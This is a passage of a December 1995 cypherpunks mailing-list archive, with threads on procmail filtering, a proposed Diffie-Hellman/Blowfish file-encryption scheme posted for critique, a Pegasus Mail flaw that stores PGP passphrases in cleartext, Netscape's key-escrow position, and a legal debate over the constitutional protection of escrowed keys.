9Jx6wYWVlIo=
=QLxL
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjm@ionia.engr.sgi.com (Patrick May)
Date: Sat, 9 Dec 95 15:44:42 PST
To: cypherpunks@toad.com
Subject: Re: CP: Mailing List Subjects
In-Reply-To: <199512090643.WAA26800@jobe.shell.portal.com>
Message-ID: <199512092346.PAA12661@ionia.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

anonymous-remailer@shell.portal.com writes:
 > On Fri, 8 Dec 1995, Michael Handler wrote:
 > > Learn procmail. It'll save you hours upon hours of time.
 > >
 > > :0:
 > > * (^From owner-cypherpunks@toad\.com|^Sender: owner-cypherpunks@toad\.com)
 > > lists/cypherpunks
 > 
 > Would the following work??
 > 
 >  :0
 >  * (^From|^Sender).*owner-cypherpunks@toad.com
 >  |/usr/bin/contrib/procmail -m ~/.punk_rc 

     Here's a .procmailrc file that will save all cypherpunks messages
to the file $HOME/Mail/IN.cypherpunks.  Note that the directories
$HOME/.procmail and $HOME/Mail must exist.

- ----- begin .procmailrc -----
#Set on when debugging
VERBOSE=off
   
#Replace ``mail'' with your mail directory (Pine uses mail, Elm uses Mail)
MAILDIR=$HOME/Mail
 
#Directory for storing procmail log and rc files
PMDIR=$HOME/.procmail
LOGFILE=$PMDIR/log
#INCLUDERC=$PMDIR/rc.test
#INCLUDERC=$PMDIR/rc.folders
 
:0:
* ^TOcypherpunks
IN.cypherpunks
- ----- end .procmailrc -----

 > Does anyone know where the procmail archives are??  

     There are some good pointers to filtering information at:

          http://www.jazzie.com/ii/internet/mailbots.html

Regards,

pjm

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMMofoe5Yg08fDKehAQGYxQQAnPEw5vUlvuWSvFZXz24RM387WhgAUjM2
YeK4XK3Z8DbekeHclId6XeeoMFJWdnhmtyhs6xC2eIi0gyWQiKyPKlrnjE6Ve0rn
0rnp9jZjVqwIiJH36CZTX6YmgAC/43AnUuuixOjAO77qPP7td+4bciLqJKOkHovK
/Rf9lcN2i3s=
=xi2l
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kent Briggs <72124.3234@compuserve.com>
Date: Sat, 9 Dec 95 12:48:00 PST
To: cypherpunks <cypherpunks@toad.com>
Subject: Diffie-Hellman with Blowfish
Message-ID: <951209204827_72124.3234_EHJ183-1@CompuServe.COM>
MIME-Version: 1.0
Content-Type: text/plain


I am working on a program that will use Diffie-Hellman with Blowfish to create a
public-key encryption system similar to the way PGP uses RSA and IDEA.  This
system would not have the digital signature feature that
PGP has, however.  I invite comments on any security problems that I might have
overlooked.  Bruce Schneier briefly mentions this idea on p. 515 of Applied
Cryptography (2nd ed): Key Exchange Without Exchanging Keys.

Key Generation
--------------
First, users select a private key passphrase.  The passphrase is case sensitive
and from 8 to 50 characters in length.  A random 32-bit salt is generated from
timed keystrokes.  The salt is appended to the passphrase and run through an
SHA-1 hash.  The output is a 160-bit value, x.

The 1024-bit public key "y" is calculated:
y = g^x mod p     (^ denotes exponentiation)

p is a 1024-bit strong prime constant that does not change. g is the generator
for that prime and is always 2.

The KeyID for the public key is the 32-bit salt.  The user publishes the public
key and KeyID values.  The key should be certified to prevent a man in the
middle attack.  The user imports public keys from others and places them on
their public key ring.

Note that there is no private key ring.  I could have used the PGP method and
made the private key a random number and then encrypted that number with a
passphrase.  This would be more secure but I was worried about users deleting
their private key file.  The 32-bit salt will discourage a pre-computed
dictionary attack.  An attacker would have to run over 4 billion SHA's and D-H's
and store the result for every passphrase in their dictionary.  To discourage a
dictionary attack on a specific public key, I will include a tutorial on how to
choose a secure passphrase.

Encryption
----------
The program will generate a 160-bit random private session key "r" based on
timed keystrokes by the user.  A 1024-bit public session key "z" is calculated:
z=g^r mod p

z is stored in the file header.

For each recipient, a "k" value is calculated using the recipient's public key:
k=y^r mod p

The session key r is now encrypted for each recipient by running each k through
an SHA-1 hash and xoring the output with r: k'=SHA(k) xor r

For each recipient the 160-bit k' value is stored with the recipient's 32-bit
KeyID value in the file header.  Each additional recipient adds 24 bytes to the
file header.

The plaintext is then encrypted with Blowfish in CBC mode using the 160-bit r
value as the key.  r is then discarded.

Note that I use the same r key for the Blowfish session key and
the Diffie-Hellman private key.  I could have generated a
separate r1 for Blowfish and an r2 for D-H but I don't think
this is necessary.

Decryption
----------
The public session key z is retrieved from the file header.  Each recipient
matches their KeyID with one of the KeyIDs stored in the file header.  From this
match they get their particular k' value.  They enter their private key
passphrase, append the KeyID salt and run it through an SHA-1 hash to get x.  k
is then calculated: k=z^x mod p

The original private session key r is decrypted: r=SHA(k) xor k'

The ciphertext is decrypted using Blowfish with key r.

=======================================================

Does anyone see any obvious security problems that I might have overlooked?

Kent Briggs
kbriggs@execpc.com
CIS: 72124,3234
    





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Sat, 9 Dec 95 13:30:08 PST
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Warning about Pegasus Mail and PGP (fwd)
In-Reply-To: <199512092108.NAA11006@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.951209162229.340B-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 9 Dec 1995 anonymous-remailer@shell.portal.com wrote:

> I just installed the "Open Encryptor" PGP interface for Pegasus  Mail.  I found that when you sign a message and queue it, it stores your password in the clear on the hard drive. Apparently
> it doesn't sign or encrypt the message until just before
> transmitting it.  So it stores your PGP private key password
> with the message until it sends it.

Can anyone verify this?

Kinda brings new meaning to the term "Open Encryptor," huh?

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sat, 9 Dec 95 13:48:12 PST
To: jimbell@pacifier.com (jim bell)
Subject: Re: More FUD from First Virtual
In-Reply-To: <m0tOVMF-000927C@pacifier.com>
Message-ID: <199512092151.QAA05278@homeport.org>
MIME-Version: 1.0
Content-Type: text


jim bell wrote:

[Good points about cost of transactions deleted]

| The answer, I think, it that there would be no problem finding people to
| take that risk in exchange for the return, ESPECIALLY if they have some
| input into the design (level of security) of the system.  They might insist
| on 2048-bit RSA keys, instead of 1024-bit, for example.

	(I know its only an example, but...)

	Key length is not what is needed for better security; more
solid code and better interfaces are needed.  (I might also argue for
hardware keys that are more difficult to steal..)

	Cryptosystems fail because of bad storage of keys, coding
mistakes, accidentally writing passphrases to disk during a swap, etc.
Moving to 2048 bit keys is no help if you lose the key to a
non-cryptanalytic attack.  Moving to keys with a week or day lifetimes
might be better.  

	You need to figure how the system might fail, and design to
protect yourself from those failures.  Keys with a thousand bits
aren't lost to factoring very often.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Stuart <fstuart@vetmed.auburn.edu>
Date: Sat, 9 Dec 95 14:58:09 PST
To: jsw@netscape.com
Subject: Re: Netscape announces position against GAK
Message-ID: <199512092259.QAA11480@snoopy.vetmed.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


>From: tcmay@got.net (Timothy C. May)
>Subject: Re: Netscape announces position against GAK
>
>Credit where credit is due.
>
>I for one am satisfied--and even pleased--with the Netscape position on GAK.
>
>It remains to be seen how steadfast Netscape, as the major player in the
>Web browser business, remains in the face of (likely) pressure from the
>government.
>
>It seems to me that we have have been quick to criticize Netscape--which is
>good, the quickness part--and thus we should be equally quick to praise
>them. To be sure, various of us might've written the Netscape position
>statement slightly differently, but this does not change the basic point:
>that Netscape has come out against the Administration's position on GAK.
>
>For this they deserve our praise.

I agree with all of Tim's sentiments (well, in this message, anyway :>).  I'd
especially like to thank Jeff Weinstein for his hard work keeping both us
and Netscape management informed.  I think he's done us both a great service.

To avoid just saying "me too", I'll throw out another idea on making the U.S.
version of Netscape available to U.S. users over the Internet.  How about a
phone number to call to get an access id of some sort that can be used to
FTP the software.  When you call the number, you can use caller-id to verify
that the person is calling from within the U.S.  You could set up a BBS-type
system to do this automatically, or make the phone number a 900 number and
charge a few dollars to cover your costs.  You could also set up the access
id so that it can only be used once.


                          | (Douglas) Hofstadter's Law:
Frank Stuart              | It always takes longer than you expect, even 
fstuart@vetmed.auburn.edu | when you take into account Hofstadter's Law.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Date: Sat, 9 Dec 95 14:10:10 PST
To: Joel McNamara <cypherpunks@toad.com
Subject: Re: .PWL spin
Message-ID: <9512092212.AA22246@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 09:11 AM 12/9/95 -0800, Joel McNamara wrote:

>Microsoft said it plans to strengthen the encryption, Bennett said.
>Password data will be stored randomly, making it harder to find on the
>computer, he added.

        Oh that is clever! (Security through obscurity!)  Make it all the
harder to back up the file!  I had the minimal amount of security W95 allows
one to have by having the default user not be able to do anything, then the
me user to everything (for which you needed a password...)  Of course my
registry got corrupted (eudora beta for W95) and the only damn thing it did
remember was that the default user couldn't do anything, and it no longer
knew who I was...
        So now, I don't even bother with that, I'm just hoping securdrv,
sfs, or something makes it to W95 one of these days... (I doubt either of
those will make it...)
_______________________
Regards,        	It is absurd to divide people into good and bad.  
			People are either charming or tedious." -Oscar Wilde.
Joseph Reagle   	http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu  	0C 69 D4 E8 F2 70 24 33  B4 5E 5E EC 35 E6 FB 88





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Siberia" <klong@phoenix.net>
Date: Sat, 9 Dec 95 16:27:32 PST
To: cypherpunks@toad.com
Subject: Re: Warning about Pegasus Mail and PGP (fwd)
Message-ID: <199512100028.SAA26091@phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain


Okay, here's how I understand things with PGP and Pegasus.  You have two
options with Pegasus depending on the set-up options you choose.  You can
either send upon completion of your out-going email, or you can have your mail
queued until you press the send out-going mail button.  The actual PGP process
does not occur until you actually send the mail.  So the answer would be: 
don't queue your mail.  

On  9 Dec 95 at 16:24, Jon Lasser wrote:

> On Sat, 9 Dec 1995 anonymous-remailer@shell.portal.com wrote:
> 
> > I just installed the "Open Encryptor" PGP interface for Pegasus  Mail.  
> > I found that when you sign a message and queue it, it stores your password
> > in the clear on the hard drive. Apparently
> > it doesn't sign or encrypt the message until just before
> > transmitting it.  So it stores your PGP private key password
> > with the message until it sends it.
> 
> Can anyone verify this?
> 
> Kinda brings new meaning to the term "Open Encryptor," huh?
> 
> Jon
> ------------------------------------------------------------------------------
> Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
>           Visit my home page at http://www.goucher.edu/~jlasser/
>   You have a friend at the NSA: Big Brother is watching. Finger for PGP key.
> 
> 
> 

Namaste'

Kimberly Long
klong@phoenix.net

What is life?  It is the flash of a firefly in the night.  It is the breath of a 
buffalo in the wintertime.  It is the little shadow which runs across the 
grass and loses itself in the sunset.
                                              ~Crowfoot 1821-1890         )O( 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous User <nobody@c2.org>
Date: Sat, 9 Dec 95 20:09:44 PST
To: cypherpunks@toad.com
Subject: test
Message-ID: <199512100405.UAA24243@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


this is a test of the cypherpunk w3 anonymous remailer interface.

author is N..... B...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: clarkm@cnct.com
Date: Sun, 10 Dec 95 09:40:18 PST
To: cypherpunks@toad.com
Subject: Re: A challenge ...
Message-ID: <9512100546.AA0065@localhost>
MIME-Version: 1.0
Content-Type: text/plain


 
> According to rumor, Jordan Hayes said:
> > 
> > I've been challenged to try to find a bank account; I win the challenge
> > if I can wire in $100 to the hidden account.  Anyone have any good
> > ideas about how to find an ABA number?
> 
> Depends on what information you have. You looking for a Bank Name/ABA #
> lookup, or the other way around?

Wiring it successfully is one thing.  Escaping the exception report at 
FinCEN and the Fed is quite another.

Just an inspired guess...

     
      .---.        .----------- *     ::::::::::::::::::::::::::::
     /     \  __  /    ------ *        clark.matthews@paranet.org
    / /     \(..)/    ----- *         ::::::::::::::::::::::::::::
   //////   ' \/ `   ---- *
  //// / // :    : --- *                     PERMISSION TO
 \\/ / * / /`    '--*                        COPY / REPOST
  \*/      * //..\\
       x-x-UU----UUx-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x
           '//||\\`  N E M O..M E..I M P U N E..L A C E S S I T
       x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x
     
     




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Hupp" <jhupp@novellnet.gensys.com>
Date: Sat, 9 Dec 95 19:42:56 PST
To: cypherpunks@toad.com
Subject: Re: Warning about Pegasus Mail and PGP (fwd)
Message-ID: <34756653250@Novellnet.Gensys.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On  9 Dec 95 at 18:29, Siberia wrote:

: Okay, here's how I understand things with PGP and Pegasus.  You have two
: options with Pegasus depending on the set-up options you choose.  You can
: either send upon completion of your out-going email, or you can have your mail
: queued until you press the send out-going mail button.  The actual PGP process
: does not occur until you actually send the mail.  So the answer would be: 
: don't queue your mail.

	That's not really a solution in the Windows environment, if you have a 
swap file, you never know what gets written out to it.  The solution is 
run w/o a swap file or run an encrypted file system.  I run an 
encrypted file system.

	Pegasus will indeed save your key with your message in the outgoing 
queue.  This is a problem with the design of pegasus, not with the 
design of the add on encryptor.  
  
: 
: On  9 Dec 95 at 16:24, Jon Lasser wrote:
: 
: > On Sat, 9 Dec 1995 anonymous-remailer@shell.portal.com wrote:
: > 
: > > I just installed the "Open Encryptor" PGP interface for Pegasus  Mail.  
: > > I found that when you sign a message and queue it, it stores your password
: > > in the clear on the hard drive. Apparently
: > > it doesn't sign or encrypt the message until just before
: > > transmitting it.  So it stores your PGP private key password
: > > with the message until it sends it.
: > 
: > Can anyone verify this?
: > 
: > Kinda brings new meaning to the term "Open Encryptor," huh?
: > 
: > Jon
: > ------------------------------------------------------------------------------
: > Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
: >           Visit my home page at http://www.goucher.edu/~jlasser/
: >   You have a friend at the NSA: Big Brother is watching. Finger for PGP key.
: > 
: > 
: > 
: 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMMpJNDUjeCeeebC9AQFsdAf+OY1FPLqSbHYyB+MnUl56dau9gFouoLKf
y5UDCE9d4w2ndo6iKOGk7UzfTR3vYQaJmfEI2og+37hi2au01mHm/T0IAUOFYOYr
owr6Xn8TZ8vHPOEe71LYRdad60ZdlkPr7H3Nxc9l7O9ueZp0SAM4xPMZmMPUkb8V
d4j2m1kbLOHHNmqFmHWjxXvKLaowF/38cgbV9VuDFatySZuM9TdaVQEbazum0uDE
LOgUzrQqs2GqlDOB1WMkvJv947SPHhjCJQTcygtS6SoGJv6AzLCL0LtstmBnCOgI
zRIrX5wgFSp49BRdmE0/xp62+TuaGCZ6ml8iW/zS9ab7GSeOA2Qs6Q==
=GINp
-----END PGP SIGNATURE-----
-- 
JHupp@gensys.com           |For PGP Public Key:
http://gensys.com          |finger jhupp@gensys.com
Animals can be driven crazy by placing too many in too small a pen.
Homo sapiens is the only animal that voluntarily does this to himself.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 9 Dec 95 21:17:12 PST
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Netscape announces position against GAK
In-Reply-To: <199512100446.UAA00146@blob.best.net>
Message-ID: <Pine.SUN.3.91.951210001729.28482A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 8 Dec 1995, James A. Donald wrote:

> At 04:27 AM 12/9/95 -0800, Timothy C. May wrote:
> >Credit where credit is due.
> >
> >I for one am satisfied--and even pleased--with the Netscape position on GAK.
> 
> Well I for one, am serious unsatisfied, but it is not so bad as
> to merit a campaign against Netscape.

I think it's a good start.  I would like to see how much effort after 
this really pans out.  Doesn't take much to put out a policy statement.  
Takes a lot to follow it through.

>  ---------------------------------------------------------------------
>               				|  
> We have the right to defend ourselves	|   http://www.jim.com/jamesd/
> and our property, because of the kind	|  
> of animals that we are. True law	|   James A. Donald
> derives from this right, not from the	|  
> arbitrary power of the state.		|   jamesd@echeque.com
> 
> 

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: djw@pdcorp.com (Dan Weinstein)
Date: Sat, 9 Dec 95 16:47:06 PST
To: cypherpunks@toad.com
Subject: Re: Netscape announces position against GAK
In-Reply-To: <199512092259.QAA11480@snoopy.vetmed.auburn.edu>
Message-ID: <30ca2fb5.20633389@email.pdcorp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 9 Dec 1995 16:59:13 -0600 (CST), Frank Stuart
<fstuart@vetmed.auburn.edu> wrote:



>To avoid just saying "me too", I'll throw out another idea on making the U.S.
>version of Netscape available to U.S. users over the Internet.  How about a
>phone number to call to get an access id of some sort that can be used to
>FTP the software.  When you call the number, you can use caller-id to verify
>that the person is calling from within the U.S.  You could set up a BBS-type
>system to do this automatically, or make the phone number a 900 number and
>charge a few dollars to cover your costs.  You could also set up the access
>id so that it can only be used once.

Couldn't caller ID be fooled by call forwarding?  I am anything but an
expert on caller ID, but this seems like a possible loop hole.  This
would cause the same kind of problem that is holding up placing the
U.S. version on the Web.  


Dan Weinstein
djw@pdcorp.com
http://www.earthlink.net/~danjw
PGP public key is available from my Home Page.
All opinions expressed above are mine.

"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No.        
           Friedrich Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sat, 9 Dec 95 22:00:33 PST
To: cme@acm.org
Subject: Re: Is there a lawyer in the house?
In-Reply-To: <9512072127.AA28756@tis.com>
Message-ID: <Pine.BSF.3.91.951210005729.18670B-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Dec 1995 cme@acm.org wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> >Date: Sat, 2 Dec 1995 03:39:00 -0500 (EST)
> >From: Black Unicorn <unicorn@polaris.mindport.net>
> >Subject: Re: Netscape gives in to key escrow
> 
> >An individual has no legitimate expectation of privacy in the encryption 
> >numbers in his GAK browser, we reasoned, because he voluntarily conveyed 
> >those numbers to the government when he purchased the software.
> 
> It could be even worse.  I was on a panel last year with Scott Charney (sp?)
> (I believe from DoJ) during which he commented that if you give your secret
> key to anyone -- e.g., your own company -- then you have given up the
> presumption of privacy.  That leaves the police open to get that secret
> without a warrant.  This claim should be checked by a real lawyer.
>

I suspect that Charney was referring to the fact that the third party 
keyholder could be compelled to surrender your key under subpoena without 
having any right against self-incrimination invoked.  
And in that, of course, he was correct.  (But if you give it to your 
lawyer, for example, the communication is privileged ...).

EBD
 
> +--------------------------------------------------------------------------+
> |Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme		   |




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sat, 9 Dec 95 22:27:59 PST
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Is there a lawyer in the house?
In-Reply-To: <Pine.SUN.3.91.951208035312.18878E-100000-100000@polaris.mindport.net>
Message-ID: <Pine.BSF.3.91.951210012418.18670C-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 8 Dec 1995, Black Unicorn wrote:

> On Thu, 7 Dec 1995, Jeff Weinstein wrote:
> 
> > Black Unicorn wrote:
> > > 
> > > On Thu, 7 Dec 1995, sameer wrote:
> > > 
> >   How about if Bob had a contractual agreement with Alice to keep his
> > key secret?
> 
> Then as a defense attorney, I would argue that Bob had an obvious 
> expectation of privacy with Alice, and that the fact that he relayed this 
> key to Alice only under those circumstances represents a definite 
> expression of his intent to keep the key private, thus triggering 4th 
> amendment protections.  My view is that this would be a very strong argument.

Bob's Fourth Amendment rights are not triggered by his contract with 
Alice.  Alice can be compelled to give up the key (by testimony or 
production) and giving up that key does not tend to incriminate *Alice* 
in a violation of law.  Alice can't invoke Bob's rights against 
self-incrimination for obvious reasons:  Alice isn't Bob.
^^^^
EBD


> 
> Note that this is an academic opinion, not a legal one as I am not being 
> paid.
> 
> >
> > 	--Jeff
> > 
> > -- 
> > Jeff Weinstein - Electronic Munitions Specialist
> > Netscape Communication Corporation
> > jsw@netscape.com - http://home.netscape.com/people/jsw
> > Any opinions expressed above are mine.
> 
> ---
> My prefered and soon to be permanent e-mail address: unicorn@schloss.li
> "In fact, had Bancroft not existed,       potestas scientiae in usu est
> Franklin might have had to invent him."    in nihilum nil posse reverti
> 00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
> 
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sat, 9 Dec 95 22:40:16 PST
To: Russell Nelson <nelson@crynwr.com>
Subject: Re: Escrow expectations
In-Reply-To: <m0tO59L-000G9eC@ns.crynwr.com>
Message-ID: <Pine.BSF.3.91.951210013752.18670D-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 8 Dec 1995, Russell Nelson wrote:

> Duncan Frissell writes:
>  > At 09:17 AM 12/8/95 -0500, Adam Shostack wrote:
>  > 
>  > >	"Your honor, we argue that in escrowing his keys with the US
>  > >government, the defendant should have known his communications could
>  > >be listened to, and thus has no expectation of privacy."
>  > 
>  > If Clipper were mandated you might be able to resist a prosecution for
>  > "failure to file" keys or for double encrypting your transmissions if you
>  > could prove that you were transmitting illegal messages or evidence of a
>  > crime.  Just as those who possess illegal weapons are not required to
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>  > register them (self incrimination).  You have to be sure your traffic is
     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

You are mistaken here.  Failure to get a permit before turning a 
semi-auto firearm into a fully-auto machine gun, for example, is illegal 
as is possessing an unregistered machine gun ...

EBD




>  > illegal though otherwise no protection.
> 
> To bring two cypherpunks threads together:
> 
> That SHIT should be FUCK no DAMN problem ANAL whatsoever in a few SEX
> months.
> 
> -russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
> Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
> 11 Grant St.      | +1 315 268 1925 voice | Flushing, NY.  Not just a suburb,
> Potsdam, NY 13676 | +1 315 268 9201 FAX   | it's a good idea in general.
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 9 Dec 95 22:53:53 PST
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: Is there a lawyer in the house?
In-Reply-To: <Pine.BSF.3.91.951210012418.18670C-100000@mercury.thepoint.net>
Message-ID: <Pine.SUN.3.91.951210013333.3178A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 10 Dec 1995, Brian Davis wrote:

> On Fri, 8 Dec 1995, Black Unicorn wrote:
> 
> > On Thu, 7 Dec 1995, Jeff Weinstein wrote:
> > 
> > > Black Unicorn wrote:
> > > > 
> > > > On Thu, 7 Dec 1995, sameer wrote:
> > > > 
> > >   How about if Bob had a contractual agreement with Alice to keep his
> > > key secret?
> > 
> > Then as a defense attorney, I would argue that Bob had an obvious 
> > expectation of privacy with Alice, and that the fact that he relayed this 
> > key to Alice only under those circumstances represents a definite 
> > expression of his intent to keep the key private, thus triggering 4th 
> > amendment protections.  My view is that this would be a very strong
> > argument.
> 
> Bob's Fourth Amendment rights are not triggered by his contract with 
> Alice.  Alice can be compelled to give up the key (by testimony or 
> production) and giving up that key does not tend to incriminate *Alice* 
> in a violation of law.  Alice can't invoke Bob's rights against 
> self-incrimination for obvious reasons:  Alice isn't Bob.
> ^^^^

You've taken the narrow answer I was trying to give out of context.
As for fifth amendment questions, That's another discussion entirely.  If 
this was not an error, then you have still taken the question way beyond the
narrow scope I was addressing.

I was answering only as to how the manifestation of Bob's privacy
interest might impact the argument that the key was no longer a protected 
interest acording to the Smith v. Maryland ruling, and thus unprotected 
by the fourth amendment on those grounds.  (Assuming it would even be
applied to the Bob - Alice relationship in terms of crypto keys).

Your statement "Bob's Fourth Amendment rights are not triggered by his 
contract with Alice."  Is probably correct in the event the key is 
obtained from Alice.  It may not be if the key is obtained by electronic 
measures or otherwise without a warrant and then the argument is made 
after the fact that Bob has exerted no expectation of privacy over the 
key.  This is the key question which bears on the key escrow's 
effect on Bob's protection (Alice in that example being the escrow 
agent).  Clearly Alice in that circumstance is unlikely to give up the 
key without a warrant.  The real worry is that the authorities are given 
free reign to obtain the key by other methods from Bob, or Bob's 
communications without a warrant by the mere fact that Bob has "tendered" 
the information to Alice (the escrow agent).

Again, I'm addressing the narrow issue of voluntary surrendering of key 
information to an escrow agent and it's effect on the 'third party' 
rule in Smith v. Maryland, not the eventual outcome of an exclusionary 
hearing.

> EBD 
> 
> Not a lawyer on the Net, although I play one in real life.
> **********************************************************
> Flame away! I get treated worse in person every day!!

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Daniel Miskell <DMiskell@envirolink.org>
Date: Sat, 9 Dec 95 23:02:34 PST
To: jwhiting@igc.apc.org
Subject: Re: The Elevator Problem
Message-ID: <9512100703.AA27209@envirolink.org>
MIME-Version: 1.0
Content-Type: text/plain


There is an easy way to develop a secret key in front any number of eves, be 
they experts or not, without the eves knowing what the key is.  Even if they 
tap your phone/comm line, ect.  There was an article in Discovery Magazine a 
couple of years ago, talking about how to use photons and their randomness as 
the perfect, uncrackable code.  Use of the photons aside, there was a key 
generation method discussed, simple, yet secure enough to work out on a tapped 
phone.  Let me root around.

Regards,
Munster.
---
_________________________________
*!Cheese Doctrine:!*
    Though cultured over time,
and aged to perfection, one must
not yield to produce mold.  One
must also not belittle themselves
by conforming to the "whiz", but
melt over the unprocessed ideas
of Ghuda.
_________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sat, 9 Dec 95 23:29:07 PST
To: Black Unicorn <cypherpunks@toad.com
Subject: Re: Is there a lawyer in the house?
In-Reply-To: <Pine.BSF.3.91.951210012418.18670C-100000@mercury.thepoint.net>
Message-ID: <Pine.BSF.3.91.951210022636.18670F-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 10 Dec 1995, Brian Davis wrote:
> 
> Bob's Fourth Amendment rights are not triggered by his contract with 
        ^^^^^^
Ack.  Meant "Fifth." (Although Bob's Fourth Amendment rights are 
not triggered either.)

> Alice.  Alice can be compelled to give up the key (by testimony or 
> production) and giving up that key does not tend to incriminate *Alice* 
> in a violation of law.  Alice can't invoke Bob's rights against 
> self-incrimination for obvious reasons:  Alice isn't Bob.
> ^^^^
> EBD
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sat, 9 Dec 95 23:32:53 PST
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Is there a lawyer in the house?
In-Reply-To: <Pine.SUN.3.91.951210013333.3178A-100000@polaris.mindport.net>
Message-ID: <Pine.BSF.3.91.951210023002.18670G-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 10 Dec 1995, Black Unicorn wrote:

> On Sun, 10 Dec 1995, Brian Davis wrote:
> 
> > On Fri, 8 Dec 1995, Black Unicorn wrote:
> > 
> > > On Thu, 7 Dec 1995, Jeff Weinstein wrote:
> > > 
> > > > Black Unicorn wrote:
> > > > > 
> > > > > On Thu, 7 Dec 1995, sameer wrote:
> > > > > 
> > > >   How about if Bob had a contractual agreement with Alice to keep his
> > > > key secret?
> > > 
> > > Then as a defense attorney, I would argue that Bob had an obvious 
> > > expectation of privacy with Alice, and that the fact that he relayed this 
> > > key to Alice only under those circumstances represents a definite 
> > > expression of his intent to keep the key private, thus triggering 4th 
> > > amendment protections.  My view is that this would be a very strong
> > > argument.
> > 
> > Bob's Fourth Amendment rights are not triggered by his contract with 
> > Alice.  Alice can be compelled to give up the key (by testimony or 
> > production) and giving up that key does not tend to incriminate *Alice* 
